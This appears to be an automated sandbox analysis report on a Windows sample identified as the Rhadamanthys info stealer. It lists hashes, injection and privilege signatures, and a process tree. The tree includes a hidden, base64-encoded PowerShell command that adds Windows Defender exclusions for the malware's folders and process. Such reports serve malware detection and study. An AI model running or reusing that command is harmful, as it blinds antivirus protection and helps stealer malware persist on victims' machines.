Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 15:58
Static task
static1
Behavioral task
behavioral1
Sample
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
Resource
win10v2004-20240709-en
General
-
Target
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
-
Size
4.3MB
-
MD5
651962c322d049e7271543d8d2673311
-
SHA1
e4a3c9a15006aae882697cff0ec90795f658ee94
-
SHA256
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546
-
SHA512
121b96a1ce8e12924e41c2243cea25dbc13240c6cfadcfe01aecbea1c6676261cbcf89677fb1a8e429e22d47b1030b9e24e03b96a5f7e956316f02bd8d2c74b1
-
SSDEEP
98304:fh0DJ8JeTBYX6L9jeMr31y0pv/u4EmRIO3HLWjds/ht/tpxeSZ:bJeTKX6L9fHBW4bW+zdeS
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exedescription pid process target process PID 760 created 1184 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Explorer.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 8768 powershell.exe 9020 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
blue.exeblue.exeVersion.exeVersion.exepid process 992 blue.exe 2640 blue.exe 9016 Version.exe 5404 Version.exe -
Loads dropped DLL 2 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exepid process 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 992 blue.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exeVersion.exeVersion.exeMSBuild.exedescription pid process target process PID 1956 set thread context of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 992 set thread context of 2640 992 blue.exe blue.exe PID 9016 set thread context of 5404 9016 Version.exe Version.exe PID 5404 set thread context of 3176 5404 Version.exe MSBuild.exe PID 3176 set thread context of 2572 3176 MSBuild.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exedialer.exepowershell.exeVersion.exepowershell.exepid process 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 8472 dialer.exe 8472 dialer.exe 8472 dialer.exe 8472 dialer.exe 8768 powershell.exe 5404 Version.exe 5404 Version.exe 9020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exeblue.exepowershell.exeVersion.exeVersion.exeMSBuild.exeMSBuild.exepowershell.exedescription pid process Token: SeDebugPrivilege 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Token: SeDebugPrivilege 992 blue.exe Token: SeDebugPrivilege 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Token: SeDebugPrivilege 992 blue.exe Token: SeDebugPrivilege 2640 blue.exe Token: SeDebugPrivilege 8768 powershell.exe Token: SeDebugPrivilege 9016 Version.exe Token: SeDebugPrivilege 9016 Version.exe Token: SeDebugPrivilege 5404 Version.exe Token: SeDebugPrivilege 3176 MSBuild.exe Token: SeDebugPrivilege 3176 MSBuild.exe Token: SeDebugPrivilege 2572 MSBuild.exe Token: SeDebugPrivilege 9020 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exe33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exetaskeng.exetaskeng.exeVersion.exeVersion.exeMSBuild.exedescription pid process target process PID 1956 wrote to memory of 992 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 1956 wrote to memory of 992 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 1956 wrote to memory of 992 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 1956 wrote to memory of 992 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 1956 wrote to memory of 760 1956 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 992 wrote to memory of 2640 992 blue.exe blue.exe PID 760 wrote to memory of 8472 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe dialer.exe PID 760 wrote to memory of 8472 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe dialer.exe PID 760 wrote to memory of 8472 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe dialer.exe PID 760 wrote to memory of 8472 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe dialer.exe PID 760 wrote to memory of 8472 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe dialer.exe PID 760 wrote to memory of 8472 760 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe dialer.exe PID 8736 wrote to memory of 8768 8736 taskeng.exe powershell.exe PID 8736 wrote to memory of 8768 8736 taskeng.exe powershell.exe PID 8736 wrote to memory of 8768 8736 taskeng.exe powershell.exe PID 8984 wrote to memory of 9016 8984 taskeng.exe Version.exe PID 8984 wrote to memory of 9016 8984 taskeng.exe Version.exe PID 8984 wrote to memory of 9016 8984 taskeng.exe Version.exe PID 8984 wrote to memory of 9016 8984 taskeng.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 9016 wrote to memory of 5404 9016 Version.exe Version.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 5404 wrote to memory of 3176 5404 Version.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 3176 wrote to memory of 2572 3176 MSBuild.exe MSBuild.exe PID 8736 wrote to memory of 9020 8736 taskeng.exe powershell.exe PID 8736 wrote to memory of 9020 8736 taskeng.exe powershell.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\blue.exe"C:\Users\Admin\AppData\Local\Temp\blue.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Users\Admin\AppData\Local\Temp\blue.exe"C:\Users\Admin\AppData\Local\Temp\blue.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:8472
-
C:\Windows\system32\taskeng.exetaskeng.exe {55E5DAE8-D5C0-4B4E-893A-EC551B6876CB} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:8736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVgBlAHIAcwBpAG8AbgAuAGUAeABlADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVgBlAHIAcwBpAG8AbgAuAGUAeABlADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:9020
-
C:\Windows\system32\taskeng.exetaskeng.exe {B7807092-ACCA-489D-8686-8B9B3D3FDEAD} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:8984 -
C:\Users\Admin\AppData\Local\AuditRuleType\bquymr\Version.exeC:\Users\Admin\AppData\Local\AuditRuleType\bquymr\Version.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:9016 -
C:\Users\Admin\AppData\Local\AuditRuleType\bquymr\Version.exe"C:\Users\Admin\AppData\Local\AuditRuleType\bquymr\Version.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5404 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD539bc8afe98ccd057430e513d8f6c6bbf
SHA126431c8a30578cd36eb00bfaa90ab6c06f8a5b6b
SHA256bb79a48561246dc2ce1f46a59640d2e34395c57d6f77e9e862b7d297b809727f
SHA512d3e78a152fe7c3ab5f7e8a4bdf148ee38132b13e07244981d9b2f0421db80aec4ff7866f8af84d2b8c7fa7f8bd5f02e217a5a5ad985fd7612dc2b95a2e077ee2
-
Filesize
2.1MB
MD530cd8c00307286863dba2ec13fb2a611
SHA165815b908d5fd2905f70240d6dfe6e17f3c78aa1
SHA256c68192f008c1b7638e18ec1a6e5787953ea6775bb33acf9a12f64440f3b788e7
SHA51276a903bdb21ae382cd737432b2f5b3152589a3d3863c9120e9ad850d8cb46e07b90ed42f21d74840d4dc1383f2aee7bfc24f3f10eba94858e84af762bd404335